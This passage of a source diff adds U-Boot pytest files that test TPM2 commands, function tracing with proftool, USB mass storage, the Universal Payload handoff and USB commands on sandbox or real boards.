The LOCKOUT/PLATFORM hierarchies must + not have a password set, otherwise this test will fail. ENDORSEMENT and + PLATFORM hierarchies are also available. + """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + + skip_test = ubman.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + ubman.run_command('tpm2 clear TPM2_RH_LOCKOUT') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + ubman.run_command('tpm2 clear TPM2_RH_PLATFORM') + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_change_auth(ubman): + """Execute a TPM2_HierarchyChangeAuth command. + + Ask the TPM to change the owner, ie. set a new password: 'unicorn' + + Use the LOCKOUT hierarchy for this. ENDORSEMENT and PLATFORM hierarchies are + also available. + """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + force_init(ubman) + + ubman.run_command('tpm2 change_auth TPM2_RH_LOCKOUT unicorn') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + ubman.run_command('tpm2 clear TPM2_RH_LOCKOUT unicorn') + output = ubman.run_command('echo $?') + ubman.run_command('tpm2 clear TPM2_RH_PLATFORM') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('sandbox') +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_get_capability(ubman): + """Execute a TPM_GetCapability command. + + Display one capability. In our test case, let's display the default DAM + lockout counter that should be 0 since the CLEAR: + - TPM_CAP_TPM_PROPERTIES = 0x6 + - TPM_PT_LOCKOUT_COUNTER (1st parameter) = PTR_VAR + 14 + + There is no expected default values because it would depend on the chip + used. We can still save them in order to check they have changed later. + """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + + force_init(ubman) + ram = utils.find_ram_base(ubman) + + read_cap = ubman.run_command('tpm2 get_capability 0x6 0x20e 0x200 1') #0x%x 1' % ram) + output = ubman.run_command('echo $?') + assert output.endswith('0') + assert 'Property 0x0000020e: 0x00000000' in read_cap + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_dam_parameters(ubman): + """Execute a TPM2_DictionaryAttackParameters command. + + Change Dictionary Attack Mitigation (DAM) parameters. Ask the TPM to change: + - Max number of failed authentication before lockout: 3 + - Time before the failure counter is automatically decremented: 10 sec + - Time after a lockout failure before it can be attempted again: 0 sec + + For an unknown reason, the DAM parameters must be changed before changing + the authentication, otherwise the lockout will be engaged after the first + failed authentication attempt. + """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + force_init(ubman) + ram = utils.find_ram_base(ubman) + + # Set the DAM parameters to known values + ubman.run_command('tpm2 dam_parameters 3 10 0') + output = ubman.run_command('echo $?') + assert output.endswith('0') + + # Check the values have been saved + read_cap = ubman.run_command('tpm2 get_capability 0x6 0x20f 0x%x 3' % ram) + output = ubman.run_command('echo $?') + assert output.endswith('0') + assert 'Property 0x0000020f: 0x00000003' in read_cap + assert 'Property 0x00000210: 0x0000000a' in read_cap + assert 'Property 0x00000211: 0x00000000' in read_cap + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_pcr_read(ubman): + """Execute a TPM2_PCR_Read command. + + Perform a PCR read of the 10th PCR. Must be zero. 
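+
+    Rough outline (mirroring the test body): run 'tpm2 pcr_read 10 <addr>',
+    expect the output to report 'PCR #10 sha256 32 byte content' with an
+    all-zero digest, and record the '<n> known updates' count.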
+ """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + + force_init(ubman) + ram = utils.find_ram_base(ubman) + + read_pcr = ubman.run_command('tpm2 pcr_read 10 0x%x' % ram) + output = ubman.run_command('echo $?') + assert output.endswith('0') + + # Save the number of PCR updates + str = re.findall(r'\d+ known updates', read_pcr)[0] + global updates + updates = int(re.findall(r'\d+', str)[0]) + + # Check the output value + assert 'PCR #10 sha256 32 byte content' in read_pcr + assert '00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00' in read_pcr + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_pcr_extend(ubman): + """Execute a TPM2_PCR_Extend command. + + Perform a PCR extension with a known hash in memory (zeroed since the board + must have been rebooted). + + No authentication mechanism is used here, not protecting against packet + replay, yet. + """ + if is_sandbox(ubman): + tpm2_sandbox_init(ubman) + force_init(ubman) + ram = utils.find_ram_base(ubman) + + read_pcr = ubman.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = ubman.run_command('echo $?') + assert output.endswith('0') + str = re.findall(r'\d+ known updates', read_pcr)[0] + updates = int(re.findall(r'\d+', str)[0]) + + ubman.run_command('tpm2 pcr_extend 10 0x%x' % ram) + output = ubman.run_command('echo $?') + assert output.endswith('0') + + # Read the value back into a different place so we can still use 'ram' as + # our zero bytes + read_pcr = ubman.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = ubman.run_command('echo $?') + assert output.endswith('0') + assert 'f5 a5 fd 42 d1 6a 20 30 27 98 ef 6e d3 09 97 9b' in read_pcr + assert '43 00 3d 23 20 d9 f0 e8 ea 98 31 a9 27 59 fb 4b' in read_pcr + + str = re.findall(r'\d+ known updates', read_pcr)[0] + new_updates = int(re.findall(r'\d+', str)[0]) + assert (updates + 1) == new_updates + + ubman.run_command('tpm2 pcr_extend 10 0x%x' % ram) + output = ubman.run_command('echo $?') + assert output.endswith('0') + + read_pcr = ubman.run_command('tpm2 pcr_read 10 0x%x' % (ram + 0x20)) + output = ubman.run_command('echo $?') + assert output.endswith('0') + assert '7a 05 01 f5 95 7b df 9c b3 a8 ff 49 66 f0 22 65' in read_pcr + assert 'f9 68 65 8b 7a 9c 62 64 2c ba 11 65 e8 66 42 f5' in read_pcr + + str = re.findall(r'\d+ known updates', read_pcr)[0] + new_updates = int(re.findall(r'\d+', str)[0]) + assert (updates + 2) == new_updates + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_cleanup(ubman): + """Ensure the TPM is cleared from password or test related configuration.""" + + force_init(ubman, True) diff --git a/test/py/tests/test_trace.py b/test/py/tests/test_trace.py new file mode 100644 index 00000000000..6ac1b225465 --- /dev/null +++ b/test/py/tests/test_trace.py @@ -0,0 +1,335 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os +import pytest +import re + +import utils + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR = '/tmp/test_trace' + +# Decode a function-graph line +RE_LINE = re.compile(r'.*0\.\.\.\.\.? 
\s*([0-9.]*): func.*[|](\s*)(\S.*)?([{};])$') + + +def collect_trace(ubman): + """Build U-Boot and run it to collect a trace + + Args: + ubman (ConsoleBase): U-Boot console + + Returns: + tuple: + str: Filename of the output trace file + int: Microseconds taken for initf_dm according to bootstage + """ + ubman.run_command('trace pause') + out = ubman.run_command('trace stats') + + # The output is something like this: + # 251,003 function sites + # 1,160,283 function calls + # 0 untracked function calls + # 1,230,758 traced function calls (341538 dropped due to overflow) + # 33 maximum observed call depth + # 15 call depth limit + # 748,268 calls not traced due to depth + # 1,230,758 max function calls + + # Get a dict of values from the output + lines = [line.split(maxsplit=1) for line in out.splitlines() if line] + vals = {key: val.replace(',', '') for val, key in lines} + + assert int(vals['function sites']) > 100000 + assert int(vals['function calls']) > 200000 + assert int(vals['untracked function calls']) == 0 + assert int(vals['maximum observed call depth']) > 30 + assert (vals['call depth limit'] == + ubman.config.buildconfig.get('config_trace_call_depth_limit')) + assert int(vals['calls not traced due to depth']) > 100000 + + out = ubman.run_command('bootstage report') + # Accumulated time: + # 19,104 dm_r + # 23,078 of_live + # 46,280 dm_f + dm_f_time = [line.split()[0] for line in out.replace(',', '').splitlines() + if 'dm_f' in line] + + # Read out the trace data + addr = 0x02000000 + size = 0x02000000 + out = ubman.run_command(f'trace calls {addr:x} {size:x}') + print(out) + fname = os.path.join(TMPDIR, 'trace') + out = ubman.run_command( + 'host save hostfs - %x %s ${profoffset}' % (addr, fname)) + return fname, int(dm_f_time[0]) + + +def wipe_and_collect_trace(ubman): + """Pause and wipe traces, return the number of calls (should be zero) + + Args: + ubman (ConsoleBase): U-Boot console + + Returns: + int: the number of traced function calls reported by 'trace stats' + """ + ubman.run_command('trace pause') + ubman.run_command('trace wipe') + out = ubman.run_command('trace stats') + + # The output is something like this: + # 117,221 function sites + # 0 function calls + # 0 untracked function calls + # 0 traced function calls + + # Get a dict of values from the output + lines = [line.split(maxsplit=1) for line in out.splitlines() if line] + vals = {key: val.replace(',', '') for val, key in lines} + + return int(vals['traced function calls']) + + +def check_function(ubman, fname, proftool, map_fname, trace_dat): + """Check that the 'function' output works + + Args: + ubman (ConsoleBase): U-Boot console + fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_dat (str): Filename of output file + """ + out = utils.run_and_log( + ubman, [proftool, '-t', fname, '-o', trace_dat, '-m', map_fname, + 'dump-ftrace']) + + # Check that trace-cmd can read it + out = utils.run_and_log(ubman, ['trace-cmd', 'dump', trace_dat]) + + # Tracing meta data in file /tmp/test_trace/trace.dat: + # [Initial format] + # 6 [Version] + # 0 [Little endian] + # 4 [Bytes in a long] + # 4096 [Page size, bytes] + # [Header page, 205 bytes] + # [Header event, 205 bytes] + # [Ftrace format, 3 events] + # [Events format, 0 systems] + # [Kallsyms, 342244 bytes] + # [Trace printk, 0 bytes] + # [Saved command lines, 9 bytes] + # 1 [CPUs with tracing data] + # [6 options] + # [Flyrecord tracing data] + # [Tracing clock] + # [local] global counter 
uptime perf mono mono_raw boot x86-tsc + assert '[Flyrecord tracing data]' in out + assert '4096 [Page size, bytes]' in out + kallsyms = [line.split() for line in out.splitlines() if 'Kallsyms' in line] + # [['[Kallsyms,', '342244', 'bytes]']] + val = int(kallsyms[0][1]) + assert val > 50000 # Should be at least 50KB of symbols + + # Check that the trace has something useful + cmd = f"trace-cmd report -l {trace_dat} |grep -E '(initf_|initr_)'" + out = utils.run_and_log(ubman, ['sh', '-c', cmd]) + + # Format: + # u-boot-1 0..... 60.805596: function: initf_malloc + # u-boot-1 0..... 60.805597: function: initf_malloc + # u-boot-1 0..... 60.805601: function: initf_bootstage + # u-boot-1 0..... 60.805607: function: initf_bootstage + + lines = [line.replace(':', '').split() for line in out.splitlines()] + vals = {items[4]: float(items[2]) for items in lines if len(items) == 5} + base = None + max_delta = 0 + for timestamp in vals.values(): + if base: + max_delta = max(max_delta, timestamp - base) + else: + base = timestamp + + # Check for some expected functions + assert 'initf_malloc' in vals.keys() + assert 'initr_watchdog' in vals.keys() + assert 'initr_dm' in vals.keys() + + # All the functions should be executed within five seconds at most + assert max_delta < 5 + + +def check_funcgraph(ubman, fname, proftool, map_fname, trace_dat): + """Check that the 'funcgraph' output works + + Args: + ubman (ConsoleBase): U-Boot console + fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_dat (str): Filename of output file + + Returns: + int: Time taken by the first part of the initf_dm() function, in us + """ + + # Generate the funcgraph format + out = utils.run_and_log( + ubman, [proftool, '-t', fname, '-o', trace_dat, '-m', map_fname, + 'dump-ftrace', '-f', 'funcgraph']) + + # Check that the trace has what we expect + cmd = f'trace-cmd report -l {trace_dat} |head -n 70' + out = utils.run_and_log(ubman, ['sh', '-c', cmd]) + + # First look for this: + # u-boot-1 0..... 282.101360: funcgraph_entry: 0.004 us | initf_malloc(); + # ... + # u-boot-1 0..... 282.101369: funcgraph_entry: | initf_bootstage() { + # u-boot-1 0..... 282.101369: funcgraph_entry: | bootstage_init() { + # u-boot-1 0..... 282.101369: funcgraph_entry: | dlmalloc() { + # ... + # u-boot-1 0..... 282.101375: funcgraph_exit: 0.001 us | } + # Then look for this: + # u-boot-1 0..... 282.101375: funcgraph_exit: 0.006 us | } + # Then check for this: + # u-boot-1 0..... 
282.101375: funcgraph_entry: 0.000 us | calc_reloc_ofs(); + + expected_indent = None + found_start = False + found_end = False + upto = None + + # Look for initf_bootstage() entry and make sure we see the exit + # Collect the time for initf_dm() + for line in out.splitlines(): + m = RE_LINE.match(line) + if m: + timestamp, indent, func, brace = m.groups() + if found_end: + upto = func + break + elif func == 'initf_bootstage() ': + found_start = True + expected_indent = indent + ' ' + elif found_start and indent == expected_indent and brace == '}': + found_end = True + + # The next function after initf_bootstage() exits should be + # initcall_is_event() + assert upto == 'calc_reloc_ofs()' + + # Now look for initf_dm() and dm_timer_init() so we can check the bootstage + # time + cmd = f"trace-cmd report -l {trace_dat} |grep -E '(initf_dm|dm_timer_init)'" + out = utils.run_and_log(ubman, ['sh', '-c', cmd]) + + start_timestamp = None + end_timestamp = None + for line in out.splitlines(): + m = RE_LINE.match(line) + if m: + timestamp, indent, func, brace = m.groups() + if func == 'initf_dm() ': + start_timestamp = timestamp + elif func == 'dm_timer_init() ': + end_timestamp = timestamp + break + assert start_timestamp and end_timestamp + + # Convert the time to microseconds + return int((float(end_timestamp) - float(start_timestamp)) * 1000000) + + +def check_flamegraph(ubman, fname, proftool, map_fname, trace_fg): + """Check that the 'flamegraph' output works + + This spot checks a few call counts and estimates the time taken by the + initf_dm() function + + Args: + ubman (ConsoleBase): U-Boot console + fname (str): Filename of trace file + proftool (str): Filename of proftool + map_fname (str): Filename of System.map + trace_fg (str): Filename of output file + + Returns: + int: Approximate number of microseconds used by the initf_dm() function + """ + + # Generate the flamegraph format + out = utils.run_and_log( + ubman, [proftool, '-t', fname, '-o', trace_fg, '-m', map_fname, + 'dump-flamegraph']) + + # We expect dm_timer_init() to be called twice: once before relocation and + # once after + look1 = 'initf_dm;dm_timer_init 1' + look2 = 'board_init_r;initcall_run_list;initr_dm_devices;dm_timer_init 1' + found = 0 + with open(trace_fg, 'r') as fd: + for line in fd: + line = line.strip() + if line == look1 or line == look2: + found += 1 + assert found == 2 + + # Generate the timing graph + utils.run_and_log( + ubman, [proftool, '-t', fname, '-o', trace_fg, '-m', map_fname, + 'dump-flamegraph', '-f', 'timing']) + + # Add up all the time spend in initf_dm() and its children + total = 0 + with open(trace_fg, 'r') as fd: + for line in fd: + line = line.strip() + if line.startswith('initf_dm'): + func, val = line.split() + count = int(val) + total += count + return total + +check_flamegraph +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('trace') +def test_trace(ubman): + """Test we can build sandbox with trace, collect and process a trace""" + + if not os.path.exists(TMPDIR): + os.mkdir(TMPDIR) + proftool = os.path.join(ubman.config.build_dir, 'tools', 'proftool') + map_fname = os.path.join(ubman.config.build_dir, 'System.map') + trace_dat = os.path.join(TMPDIR, 'trace.dat') + trace_fg = os.path.join(TMPDIR, 'trace.fg') + + fname, dm_f_time = collect_trace(ubman) + + check_function(ubman, fname, proftool, map_fname, trace_dat) + trace_time = check_funcgraph(ubman, fname, proftool, map_fname, trace_dat) + + # Check that bootstage and funcgraph agree to within 10 
microseconds + diff = abs(trace_time - dm_f_time) + print(f'trace_time {trace_time}, dm_f_time {dm_f_time}') + assert diff / dm_f_time < 0.01 + + fg_time = check_flamegraph(ubman, fname, proftool, map_fname, trace_fg) + + # Check that bootstage and flamegraph agree to within 30% + # This allows for CI being slow to run + diff = abs(fg_time - dm_f_time) + assert diff / dm_f_time < 0.3 + + # Check that the trace buffer can be wiped + numcalls = wipe_and_collect_trace(ubman) + assert numcalls == 0 diff --git a/test/py/tests/test_ums.py b/test/py/tests/test_ums.py new file mode 100644 index 00000000000..caf6c0a7270 --- /dev/null +++ b/test/py/tests/test_ums.py @@ -0,0 +1,231 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Test U-Boot's "ums" command. The test starts UMS in U-Boot, waits for USB +# device enumeration on the host, reads a small block of data from the UMS +# block device, optionally mounts a partition and performs filesystem-based +# read/write tests, and finally aborts the "ums" command in U-Boot. + +import os +import os.path +import pytest +import re +import time +import utils + +""" +Note: This test relies on: + +a) boardenv_* to contain configuration values to define which USB ports are +available for testing. Without this, this test will be automatically skipped. +For example: + +# Leave this list empty if you have no block_devs below with writable +# partitions defined. +env__mount_points = ( + '/mnt/ubtest-mnt-p2371-2180-na', +) + +env__usb_dev_ports = ( + { + 'fixture_id': 'micro_b', + 'tgt_usb_ctlr': '0', + 'host_ums_dev_node': '/dev/disk/by-path/pci-0000:00:14.0-usb-0:13:1.0-scsi-0:0:0:0', + }, +) + +env__block_devs = ( + # eMMC; always present + { + 'fixture_id': 'emmc', + 'type': 'mmc', + 'id': '0', + # The following two properties are optional. + # If present, the partition will be mounted and a file written-to and + # read-from it. If missing, only a simple block read test will be + # performed. + 'writable_fs_partition': 1, + 'writable_fs_subdir': 'tmp/', + }, + # SD card; present since I plugged one in + { + 'fixture_id': 'sd', + 'type': 'mmc', + 'id': '1' + }, +) + +b) udev rules to set permissions on devices nodes, so that sudo is not +required. For example: + +ACTION=="add", SUBSYSTEM=="block", SUBSYSTEMS=="usb", KERNELS=="3-13", MODE:="666" + +(You may wish to change the group ID instead of setting the permissions wide +open. All that matters is that the user ID running the test can access the +device.) + +c) /etc/fstab entries to allow the block device to be mounted without requiring +root permissions. For example: + +/dev/disk/by-path/pci-0000:00:14.0-usb-0:13:1.0-scsi-0:0:0:0-part1 /mnt/ubtest-mnt-p2371-2180-na ext4 noauto,user,nosuid,nodev + +This entry is only needed if any block_devs above contain a +writable_fs_partition value. +""" + +@pytest.mark.buildconfigspec('cmd_usb_mass_storage') +def test_ums(ubman, env__usb_dev_port, env__block_devs): + """Test the "ums" command; the host system must be able to enumerate a UMS + device when "ums" is running, block and optionally file I/O are tested, + and this device must disappear when "ums" is aborted. + + Args: + ubman: A U-Boot console connection. + env__usb_dev_port: The single USB device-mode port specification on + which to run the test. See the file-level comment above for + details of the format. + env__block_devs: The list of block devices that the target U-Boot + device has attached. 
See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + have_writable_fs_partition = 'writable_fs_partition' in env__block_devs[0] + if not have_writable_fs_partition: + # If 'writable_fs_subdir' is missing, we'll skip all parts of the + # testing which mount filesystems. + ubman.log.warning( + 'boardenv missing "writable_fs_partition"; ' + + 'UMS testing will be limited.') + + tgt_usb_ctlr = env__usb_dev_port['tgt_usb_ctlr'] + host_ums_dev_node = env__usb_dev_port['host_ums_dev_node'] + + # We're interested in testing USB device mode on each port, not the cross- + # product of that with each device. So, just pick the first entry in the + # device list here. We'll test each block device somewhere else. + tgt_dev_type = env__block_devs[0]['type'] + tgt_dev_id = env__block_devs[0]['id'] + if have_writable_fs_partition: + mount_point = ubman.config.env['env__mount_points'][0] + mount_subdir = env__block_devs[0]['writable_fs_subdir'] + part_num = env__block_devs[0]['writable_fs_partition'] + host_ums_part_node = '%s-part%d' % (host_ums_dev_node, part_num) + test_f = utils.PersistentRandomFile(ubman, 'ums.bin', 1024 * 1024); + mounted_test_fn = mount_point + '/' + mount_subdir + test_f.fn + else: + host_ums_part_node = host_ums_dev_node + + def start_ums(): + """Start U-Boot's ums shell command. + + This also waits for the host-side USB enumeration process to complete. + + Args: + None. + + Returns: + Nothing. + """ + + ubman.log.action( + 'Starting long-running U-Boot ums shell command') + cmd = 'ums %s %s %s' % (tgt_usb_ctlr, tgt_dev_type, tgt_dev_id) + ubman.run_command(cmd, wait_for_prompt=False) + ubman.wait_for(re.compile('UMS: LUN.*[\r\n]')) + fh = utils.wait_until_open_succeeds(host_ums_part_node) + ubman.log.action('Reading raw data from UMS device') + fh.read(4096) + fh.close() + + def mount(): + """Mount the block device that U-Boot exports. + + Args: + None. + + Returns: + Nothing. + """ + + ubman.log.action('Mounting exported UMS device') + cmd = ('/bin/mount', host_ums_part_node) + utils.run_and_log(ubman, cmd) + + def umount(ignore_errors): + """Unmount the block device that U-Boot exports. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. + """ + + ubman.log.action('Unmounting UMS device') + cmd = ('/bin/umount', host_ums_part_node) + utils.run_and_log(ubman, cmd, ignore_errors) + + def stop_ums(ignore_errors): + """Stop U-Boot's ums shell command from executing. + + This also waits for the host-side USB de-enumeration process to + complete. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. 
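+
+        Note: this is done by sending Ctrl-C to the U-Boot console and then
+        waiting until opening the host block-device node fails, i.e. the
+        device has de-enumerated.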
+ """ + + ubman.log.action( + 'Stopping long-running U-Boot ums shell command') + ubman.ctrlc() + utils.wait_until_file_open_fails(host_ums_part_node, + ignore_errors) + + ignore_cleanup_errors = True + if have_writable_fs_partition: + try: + start_ums() + try: + mount() + ubman.log.action('Writing test file via UMS') + cmd = ('rm', '-f', mounted_test_fn) + utils.run_and_log(ubman, cmd) + if os.path.exists(mounted_test_fn): + raise Exception('Could not rm target UMS test file') + cmd = ('cp', test_f.abs_fn, mounted_test_fn) + utils.run_and_log(ubman, cmd) + ignore_cleanup_errors = False + finally: + umount(ignore_errors=ignore_cleanup_errors) + finally: + stop_ums(ignore_errors=ignore_cleanup_errors) + + ignore_cleanup_errors = True + try: + start_ums() + try: + mount() + ubman.log.action('Reading test file back via UMS') + read_back_hash = utils.md5sum_file(mounted_test_fn) + cmd = ('rm', '-f', mounted_test_fn) + utils.run_and_log(ubman, cmd) + ignore_cleanup_errors = False + finally: + umount(ignore_errors=ignore_cleanup_errors) + finally: + stop_ums(ignore_errors=ignore_cleanup_errors) + + written_hash = test_f.content_hash + assert(written_hash == read_back_hash) diff --git a/test/py/tests/test_unknown_cmd.py b/test/py/tests/test_unknown_cmd.py new file mode 100644 index 00000000000..b40c57f8a10 --- /dev/null +++ b/test/py/tests/test_unknown_cmd.py @@ -0,0 +1,13 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +def test_unknown_command(ubman): + """Test that executing an unknown command causes U-Boot to print an + error.""" + + # The "unknown command" error is actively expected here, + # so error detection for it is disabled. + with ubman.disable_check('unknown_command'): + response = ubman.run_command('non_existent_cmd') + assert('Unknown command \'non_existent_cmd\' - try \'help\'' in response) diff --git a/test/py/tests/test_upl.py b/test/py/tests/test_upl.py new file mode 100644 index 00000000000..c79c32adf0b --- /dev/null +++ b/test/py/tests/test_upl.py @@ -0,0 +1,37 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2024 Google LLC +# +# Test addition of Universal Payload + +import os + +import pytest +import utils + +@pytest.mark.boardspec('sandbox_vpl') +def test_upl_handoff(ubman): + """Test of UPL handoff + + This works by starting up U-Boot VPL, which gets to SPL and then sets up a + UPL handoff using the FIT containing U-Boot proper. It then jumps to U-Boot + proper and runs a test to check that the parameters are correct. 
+ + The entire FIT is loaded into memory in SPL (in upl_load_from_image()) so + that it can be inspected in upl_test_info_norun + """ + ram = os.path.join(ubman.config.build_dir, 'ram.bin') + fdt = os.path.join(ubman.config.build_dir, 'u-boot.dtb') + + # Remove any existing RAM file, so we don't have old data present + if os.path.exists(ram): + os.remove(ram) + flags = ['-m', ram, '-d', fdt, '--upl'] + ubman.restart_uboot_with_flags(flags, use_dtb=False) + + # Make sure that Universal Payload is detected in U-Boot proper + output = ubman.run_command('upl info') + assert 'UPL state: active' == output + + # Check the FIT offsets look correct + output = ubman.run_command('ut upl -f upl_test_info_norun') + assert 'failures: 0' in output diff --git a/test/py/tests/test_usb.py b/test/py/tests/test_usb.py new file mode 100644 index 00000000000..1dcd0834f55 --- /dev/null +++ b/test/py/tests/test_usb.py @@ -0,0 +1,634 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re +import utils + +""" +Note: This test doesn't rely on boardenv_* configuration values but it can +change the test behavior. To test USB file system cases (fat32, ext2, ext4), +USB device should be formatted and valid partitions should be created for +different file system, otherwise it may leads to failure. This test will be +skipped if the USB device is not detected. + +For example: + +# Setup env__usb_device_test_skip to not skipping the test. By default, its +# value is set to True. Set it to False to run all tests for USB device. +env__usb_device_test_skip = False +""" + +def setup_usb(ubman): + if ubman.config.env.get('env__usb_device_test_skip', True): + pytest.skip('USB device test is not enabled') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_start(ubman): + setup_usb(ubman) + output = ubman.run_command('usb start') + + # if output is empty, usb start may already run as part of preboot command + # re-start the usb, in that case + if not output: + ubman.run_command('usb stop') + output = ubman.run_command('usb start') + + if 'No USB device found' in output: + pytest.skip('No USB controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No USB device present') + + controllers = 0 + storage_device = 0 + obj = re.search(r'\d USB Device\(s\) found', output) + controllers = int(obj.group()[0]) + + if not controllers: + pytest.skip('No USB device present') + + obj = re.search(r'\d Storage Device\(s\) found', output) + storage_device = int(obj.group()[0]) + + if not storage_device: + pytest.skip('No USB storage device present') + + assert 'USB init failed' not in output + assert 'starting USB...' in output + + if 'Starting the controller' in output: + assert 'USB XHCI' in output + + output = ubman.run_command('echo $?') + assert output.endswith('0') + return controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_stop(ubman): + setup_usb(ubman) + output = ubman.run_command('usb stop') + assert 'stopping USB..' in output + + output = ubman.run_command('echo $?') + assert output.endswith('0') + + output = ubman.run_command('usb dev') + assert "USB is stopped. Please issue 'usb start' first." 
in output + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_reset(ubman): + setup_usb(ubman) + output = ubman.run_command('usb reset') + + if 'No USB device found' in output: + pytest.skip('No USB controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No USB device present') + + obj = re.search(r'\d USB Device\(s\) found', output) + usb_dev_num = int(obj.group()[0]) + + if not usb_dev_num: + pytest.skip('No USB device present') + + obj = re.search(r'\d Storage Device\(s\) found', output) + usb_stor_num = int(obj.group()[0]) + + if not usb_stor_num: + pytest.skip('No USB storage device present') + + assert 'BUG' not in output + assert 'USB init failed' not in output + assert 'resetting USB...' in output + + if 'Starting the controller' in output: + assert 'USB XHCI' in output + + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_info(ubman): + controllers, storage_device = test_usb_start(ubman) + output = ubman.run_command('usb info') + + num_controller = len(re.findall(': Hub,', output)) + num_mass_storage = len(re.findall(': Mass Storage,', output)) + + assert num_controller == controllers - 1 + assert num_mass_storage == storage_device + + output = ubman.run_command('echo $?') + assert output.endswith('0') + + for i in range(0, storage_device + controllers - 1): + output = ubman.run_command('usb info %d' % i) + num_controller = len(re.findall(': Hub,', output)) + num_mass_storage = len(re.findall(': Mass Storage,', output)) + assert num_controller + num_mass_storage == 1 + assert 'No device available' not in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_tree(ubman): + controllers, storage_device = test_usb_start(ubman) + output = ubman.run_command('usb tree') + + num_controller = len(re.findall('Hub', output)) + num_mass_storage = len(re.findall('Mass Storage', output)) + + assert num_controller == controllers - 1 + assert num_mass_storage == storage_device + + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +@pytest.mark.buildconfigspec('usb_storage') +def test_usb_storage(ubman): + controllers, storage_device = test_usb_start(ubman) + output = ubman.run_command('usb storage') + + obj = re.findall(r'Capacity: (\d+|\d+[\.]?\d)', output) + devices = {} + + for key in range(int(storage_device)): + devices[key] = {} + + for x in range(int(storage_device)): + try: + capacity = float(obj[x].split()[0]) + devices[x]['capacity'] = capacity + print('USB storage device %d capacity is: %g MB' % (x, capacity)) + except ValueError: + pytest.fail('USB storage device capacity not recognized') + + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_dev(ubman): + controllers, storage_device = test_usb_start(ubman) + output = ubman.run_command('usb dev') + + assert 'no usb devices available' not in output + + output = ubman.run_command('echo $?') + assert output.endswith('0') + + devices = {} + + for key in range(int(storage_device)): + devices[key] = {} + + fail = 0 + for x in range(0, storage_device): + devices[x]['detected'] = 'yes' + output = ubman.run_command('usb dev %d' % x) + + if 'Card did not respond to voltage select' in output: + fail = 1 + devices[x]['detected'] = 'no' + + if 'No USB device found' in output: + devices[x]['detected'] = 'no' + + if 
'unknown device' in output: + devices[x]['detected'] = 'no' + + assert 'is now current device' in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + + if fail: + pytest.fail('USB device not present') + + return devices, controllers, storage_device + +@pytest.mark.buildconfigspec('cmd_usb') +def test_usb_part(ubman): + devices, controllers, storage_device = test_usb_dev(ubman) + if not devices: + pytest.skip('No devices detected') + + ubman.run_command('usb part') + + output = ubman.run_command('echo $?') + assert output.endswith('0') + + for i in range(0, storage_device): + if devices[i]['detected'] == 'yes': + ubman.run_command('usb dev %d' % i) + output = ubman.run_command('usb part') + + lines = output.split('\n') + part_fat = [] + part_ext2 = [] + part_ext4 = [] + for line in lines: + obj = re.search(r'(\d)\s+\d+\s+\d+\s+\w+\d+\w+-\d+\s+(\d+\w+)', line) + if obj: + part_id = int(obj.groups()[0]) + part_type = obj.groups()[1] + print('part_id:%d, part_type:%s' % (part_id, part_type)) + + if part_type == '0c' or part_type == '0b' or part_type == '0e': + print('Fat detected') + part_fat.append(part_id) + elif part_type == '83': + print('ext(2/4) detected') + output = ubman.run_command( + 'fstype usb %d:%d' % (i, part_id) + ) + if 'ext2' in output: + part_ext2.append(part_id) + elif 'ext4' in output: + part_ext4.append(part_id) + else: + pytest.fail('Unsupported Filesystem on device %d' % i) + devices[i]['ext4'] = part_ext4 + devices[i]['ext2'] = part_ext2 + 